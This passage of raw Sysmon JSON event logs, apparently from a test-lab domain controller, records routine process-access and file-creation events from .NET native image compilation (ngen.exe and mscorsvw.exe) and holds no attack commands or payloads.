C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:10.726","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-00104BA30A00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6729,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:10.726\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-00104BA30A00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:10.726","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-00104BA30A00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6730,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:10.789\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-0010B2A60A00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:10.789","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-0010B2A60A00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6731,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:10.789\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-0010B2A60A00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:10.789","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-0010B2A60A00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6732,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:10.789\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-0010B2A60A00}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:10.789","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-0010B2A60A00}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6733,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:11.164\r\nProcessGuid: {41C8662E-21FA-5F25-0000-0010B2A60A00}\r\nProcessId: 4528\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\System.Net.Http.dll\r\nCreationUtcTime: 2020-08-01 08:04:11.164","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:11.164","ProcessGuid":"{41C8662E-21FA-5F25-0000-0010B2A60A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\System.Net.Http.dll","CreationUtcTime":"2020-08-01 08:04:11.164","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.195\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21D4-5F25-0000-001036090A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.195","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21D4-5F25-0000-001036090A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.195\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21D4-5F25-0000-001036090A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.195","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21D4-5F25-0000-001036090A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.211\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-001042AA0A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.211","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-001042AA0A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:11","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:11.273\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FB-5F25-0000-0010D8AD0A00}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 